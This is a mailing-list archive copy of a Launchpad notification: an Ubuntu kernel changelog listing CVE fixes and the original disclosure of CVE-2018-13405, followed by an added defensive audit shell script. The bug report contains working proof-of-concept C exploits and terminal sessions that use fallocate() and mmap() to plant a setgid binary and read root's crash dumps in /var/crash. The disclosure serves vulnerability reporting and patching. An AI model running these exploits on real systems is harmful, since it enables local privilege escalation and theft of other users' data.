group.of.nepali.translators team mailing list archive
Message #25708
[Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 3.13.0-157.207
---------------
linux (3.13.0-157.207) trusty; urgency=medium

  * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)
  * CVE-2017-5715 (Spectre v2 retpoline)
    - SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"
  * CVE-2017-2583
    - KVM: x86: fix emulation of "MOV SS, null selector"
  * CVE-2017-7518
    - KVM: x86: fix singlestepping over syscall
  * CVE-2017-18270
    - KEYS: prevent creating a different user's keyrings
  * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
    - Documentation: Document array_index_nospec
    - array_index_nospec: Sanitize speculative array de-references
    - x86: Implement array_index_mask_nospec
    - x86: Introduce barrier_nospec
    - x86/get_user: Use pointer masking to limit speculation
    - x86/syscall: Sanitize syscall table de-references under speculation
    - vfs, fdtable: Prevent bounds-check bypass via speculative execution
    - nl80211: Sanitize array index in parse_txq_params
    - x86/spectre: Report get_user mitigation for spectre_v1
    - x86/kvm: Update spectre-v1 mitigation
    - nospec: Allow index argument to have const-qualified type
    - nospec: Move array_index_nospec() parameter checking into separate macro
    - nospec: Kill array_index_nospec_mask_check()
    - SAUCE: Replace osb() calls with array_index_nospec()
    - SAUCE: Rename osb() to barrier_nospec()
    - SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h
  * Prevent speculation on user controlled pointer (LP: #1775137)
    - x86: reorganize SMAP handling in user space accesses
    - x86: fix SMAP in 32-bit environments
    - x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
    - x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
    - x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec
  * CVE-2016-10208
    - ext4: validate s_first_meta_bg at mount time
    - ext4: fix fencepost in s_first_meta_bg validation
  * CVE-2018-10323
    - xfs: set format back to extents if xfs_bmap_extents_to_btree
  * CVE-2017-16911
    - usbip: prevent vhci_hcd driver from leaking a socket pointer address
  * CVE-2018-13406
    - video: uvesafb: Fix integer overflow in allocation
  * CVE-2018-10877
    - ext4: verify the depth of extent tree in ext4_find_extent()
  * CVE-2018-10881
    - ext4: clear i_data in ext4_inode_info when removing inline data
  * CVE-2018-1092
    - ext4: fail ext4_iget for root directory if unallocated
  * CVE-2018-1093
    - ext4: fix block bitmap validation when bigalloc, ^flex_bg
    - ext4: add validity checks for bitmap block numbers
  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size
  * CVE-2017-16912
    - usbip: fix stub_rx: get_pipe() to validate endpoint number
  * CVE-2018-10675
    - mm/mempolicy: fix use after free when calling get_mempolicy
  * CVE-2017-8831
    - saa7164: fix sparse warnings
    - saa7164: fix double fetch PCIe access condition
  * CVE-2017-16533
    - HID: usbhid: fix out-of-bounds bug
  * CVE-2017-16538
    - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
    - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start
  * CVE-2017-16644
    - hdpvr: Remove deprecated create_singlethread_workqueue
    - media: hdpvr: Fix an error handling path in hdpvr_probe()
  * CVE-2017-16645
    - Input: ims-psu - check if CDC union descriptor is sane
  * CVE-2017-5549
    - USB: serial: kl5kusb105: fix line-state error handling
  * CVE-2017-16532
    - usb: usbtest: fix NULL pointer dereference
  * CVE-2017-16537
    - media: imon: Fix null-ptr-deref in imon_probe
  * CVE-2017-11472
    - ACPICA: Add additional debug info/statements
    - ACPICA: Namespace: fix operand cache leak
  * CVE-2017-16643
    - Input: gtco - fix potential out-of-bound access
  * CVE-2017-16531
    - USB: fix out-of-bounds in usb_set_configuration
  * CVE-2018-10124
    - kernel/signal.c: avoid undefined behaviour in kill_something_info
  * CVE-2017-6348
    - irda: Fix lockdep annotations in hashbin_delete().
  * CVE-2017-17558
    - USB: core: prevent malicious bNumInterfaces overflow
  * CVE-2017-5897
    - ip6_gre: fix ip6gre_err() invalid reads
  * CVE-2017-6345
    - SAUCE: import sock_efree()
    - net/llc: avoid BUG_ON() in skb_orphan()
  * CVE-2017-7645
    - nfsd: check for oversized NFSv2/v3 arguments
  * CVE-2017-9984
    - ALSA: msnd: Optimize / harden DSP and MIDI loops
  * CVE-2018-1000204
    - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()
  * CVE-2018-10021
    - scsi: libsas: defer ata device eh commands to libata
  * CVE-2017-16914
    - usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer
  * CVE-2017-16913
    - usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input
  * CVE-2017-16535
    - USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor()
  * CVE-2017-16536
    - cx231xx-cards: fix NULL-deref on missing association descriptor
  * CVE-2017-16650
    - net: qmi_wwan: fix divide by 0 on bad descriptors
  * CVE-2017-18255
    - perf/core: Fix the perf_cpu_time_max_percent check
  * CVE-2018-10940
    - cdrom: information leak in cdrom_ioctl_media_changed()
  * CVE-2018-13094
    - xfs: don't call xfs_da_shrink_inode with NULL bp
  * other users' coredumps can be read via setgid directory and killpriv bypass
    (LP: #1779923) // CVE-2018-13405
    - Fix up non-directory creation in SGID directories
  * CVE-2017-16529
    - ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor
  * CVE-2017-2671
    - ping: implement proper locking
  * CVE-2017-15649
    - packet: hold bind lock when rebinding to fanout hook
    - packet: in packet_do_bind, test fanout with bind_lock held
  * CVE-2017-16527
    - ALSA: usb-audio: Kill stray URB at exiting
  * CVE-2017-16526
    - uwb: properly check kthread_run return value
  * CVE-2017-11473
    - x86/acpi: Prevent out of bound access caused by broken ACPI tables
  * CVE-2017-14991
    - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE
  * CVE-2017-2584
    - KVM: x86: Introduce segmented_write_std
  * CVE-2018-10087
    - kernel/exit.c: avoid undefined behaviour when calling wait4()
  * fscache: Fix hanging wait on page discarded by writeback (LP: #1777029)
    - fscache: Fix hanging wait on page discarded by writeback

 -- Khalid Elmously <khalid.elmously@xxxxxxxxxxxxx>  Mon, 20 Aug 2018 12:07:46 -0400
** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-10208
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11472
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11473
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14991
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-15649
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16526
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16527
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16529
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16531
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16532
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16533
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16535
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16536
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16537
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16538
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16643
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16644
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16650
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16911
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16912
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16913
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16914
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17558
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18255
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18270
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2583
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2584
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2671
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5549
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5715
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5897
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6345
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6348
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7518
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7645
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8831
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9984
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1000204
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10021
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10087
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10124
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10675
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10877
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1092
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1093
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10940
--
You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
  other users' coredumps can be read via setgid directory and killpriv bypass

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  In Progress
Bug description:
Note: I am both sending this bug report to security@xxxxxxxxxx and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as an Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/,
describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@xxxxxxxxxx/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@xxxxxxxxxx/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is
mentioned at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@xxxxxxxxxxxxxx/):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
  int src_fd = open("/usr/bin/id", O_RDONLY);
  if (src_fd == -1)
    err(1, "open 2");
  struct stat src_stat;
  if (fstat(src_fd, &src_stat))
    err(1, "fstat");
  int src_len = src_stat.st_size;
  char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
  if (src_mapping == MAP_FAILED)
    err(1, "mmap 2");
  int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
  if (fd == -1)
    err(1, "open");
  if (fallocate(fd, 0, 0, src_len))
    err(1, "fallocate");
  char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (mapping == MAP_FAILED)
    err(1, "mmap");
  memcpy(mapping, src_mapping, src_len);
  munmap(mapping, src_len);
  close(fd);
  close(src_fd);
  execl("./dir/file", "id", NULL);
  err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
  if (argc != 2) {
    printf("usage: ./fallocate <file_to_read>");
    return 1;
  }
  int src_fd = open("/bin/cat", O_RDONLY);
  if (src_fd == -1)
    err(1, "open 2");
  struct stat src_stat;
  if (fstat(src_fd, &src_stat))
    err(1, "fstat");
  int src_len = src_stat.st_size;
  char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
  if (src_mapping == MAP_FAILED)
    err(1, "mmap 2");
  unlink("/var/crash/privileged_cat"); /* in case we've already run before */
  int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
  if (fd == -1)
    err(1, "open");
  if (fallocate(fd, 0, 0, src_len))
    err(1, "fallocate");
  char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (mapping == MAP_FAILED)
    err(1, "mmap");
  memcpy(mapping, src_mapping, src_len);
  munmap(mapping, src_len);
  close(fd);
  execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
  err(1, "execl");
}
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
=============
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions
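The kernel change that closes this bug ("Fix up non-directory creation in SGID directories") stops a non-directory created inside a setgid directory from receiving the setgid bit when the creating user is not a member of the directory's group. The script below is an added audit helper, not code from the bug report or from the Ubuntu package; it lets an administrator find the two conditions the report chains together: setgid directories that other users can write to (the /var/crash layout described above is one such case), and group-executable setgid regular files sitting inside them, which on an unpatched kernel may have been planted by a user outside the group. The function names, the directory root passed in, and the constructed sample tree built in the demo section are all assumptions; the script reads file metadata only and writes nothing outside the temporary directory the demo creates.

```shell
#!/bin/sh
# Added audit helper (not from the bug report or the Ubuntu package).
# Locates setgid directories that other users can write to, and setgid
# executables stored inside them. Only metadata is inspected; nothing
# found is executed or modified.

# Print every directory under $1 that has the setgid bit AND is writable by
# "other" (mode bits 02002). That combination lets any local user create
# entries that inherit the directory's group. -xdev stays on one filesystem.
find_open_sgid_dirs() {
    find "$1" -xdev -type d -perm -2002 2>/dev/null
}

# Print every regular file under $1 that carries the setgid bit together with
# group-execute (mode bits 02010). Before the fix in linux 3.13.0-157.207 a
# user outside the directory's group could create such a file there.
find_sgid_executables() {
    find "$1" -xdev -type f -perm -2010 2>/dev/null
}

# For each open setgid directory under $1, list the setgid executables it
# contains as "directory<TAB>file" lines. Paths are read line by line, so
# names with spaces are handled.
audit_tree() {
    find_open_sgid_dirs "$1" | while IFS= read -r d; do
        find_sgid_executables "$d" | while IFS= read -r f; do
            printf '%s\t%s\n' "$d" "$f"
        done
    done
}

# Number of findings under $1; handy for cron jobs that alert on a non-zero
# value, and for tests.
count_findings() {
    audit_tree "$1" | wc -l | tr -d ' '
}

# Build a constructed sample tree in a temporary directory, run the audit
# over it, print the findings and clean up. Real use is simply, e.g.:
#   audit_tree /var/crash
demo_constructed_tree() {
    demo=$(mktemp -d)
    mkdir -m 3777 "$demo/open_sgid_dir"          # constructed: setgid + world-writable
    : > "$demo/open_sgid_dir/plain"               # constructed: ordinary file, not flagged
    : > "$demo/open_sgid_dir/sgid_exec"
    chmod 2755 "$demo/open_sgid_dir/sgid_exec"    # constructed: setgid executable
    audit_tree "$demo"
    rm -rf "$demo"
}

demo_constructed_tree
```

On a kernel with the fix applied, a setgid executable inside an open setgid directory can only have been placed there by a member of the group (or by a process holding CAP_FSETID), so any hit still deserves a look at who owns it; on an unpatched kernel the same hit is the artefact the report describes. The second finding type, an open setgid directory on its own, is a configuration worth reviewing regardless of kernel version, since it is the precondition for the whole chain.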